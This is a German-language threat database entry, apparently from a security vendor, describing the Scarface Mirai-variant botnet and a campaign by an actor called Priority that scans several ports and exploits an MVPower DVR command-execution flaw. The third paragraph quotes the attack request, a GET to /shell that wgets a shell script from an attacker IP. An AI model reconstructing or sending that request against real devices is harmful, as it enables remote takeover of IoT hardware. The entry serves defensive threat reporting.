Threat Database Botnets Scarface Botnet

Scarface Botnet

Wenn der Quellcode einer Malware-Bedrohung entweder durchgesickert oder von den Entwicklern selbst veröffentlicht wird, können selbst weniger erfahrene Bedrohungsakteure ihn übernehmen, Anpassungen an ihre Bedürfnisse vornehmen und ihn in freier Wildbahn auslösen. Dieses genaue Verhalten wurde mehrfach festgestellt, seit der Code des berüchtigten Mirai Botnet 2016 in Hackerforen veröffentlicht wurde.

Ein Bedrohungsakteur, der sich als Priorität identifiziert, steht hinter einer Angriffskampagne mit zwei verschiedenen Mirai-Varianten. Die erste bereitgestellte Nutzlast basierte auf der Demonbot Mirai-Variante und konzentrierte sich speziell auf Hadoop-Angriffe. Die zweite Nutzlast, die später in der Kampagne übernommen wird, ist weitaus weiter fortgeschritten und basiert auf der von Scarface entwickelten Mirai-Variante. Scarface ist ein bekannter Malware-Entwickler, der den Mirai-Code verwendet und versucht hat, ihn für unerfahrene Hacker leichter zugänglich zu machen und gleichzeitig die Bedrohung für die Infektion von IoT-Geräten (Internet of Things) maßzuschneidern.

Die Prioritätskampagne konzentriert sich darauf, nach mehreren Ports zu suchen - 500, 5501, 5502, 5050 und 60001 - und diese mit einem einzigen Befehl -  'GET / shell? CD% 20 / tmp;% 20wget% 20http: // 45 ( .) 13.58.4 / TPJ.sh; Befehl - anzugreifen. Laut den Infosec-Analysten, die die Priority-Kampagne analysiert haben, scheint der Angreifer ein bestimmtes Ziel vor Augen zu haben, da er hauptsächlich auf den 60001-Port abzielt, während die anderen vier eher als Ablenkung dienen als alles andere. Darüber hinaus stellten sie fest, dass die Priorität eher unerfahren sein muss, was durch die Tatsache belegt wird, dass nur eine einzige Sicherheitsanfälligkeit als Kompromissvektor ausgenutzt wurde - MVPower DVR Shell Unauthenticated Command Execution, anstelle der üblichen Anzahl von 3 bis 7 Exploits, die in anderen ähnlichen Bedrohungen zu finden sind.

Alle ersten Angriffe wurden von einer einzelnen IP-Adresse gestartet, die auf einem von Digital Ocean bereitgestellten Virtual Private Server (VPS) gehostet wurde. Hacker greifen häufig auf VPS zurück, da sie flexibel genug sind, um einen Server schnell einzurichten und ihn dann ebenso schnell zu löschen.

Im Trend

Am häufigsten gesehen

Wird geladen...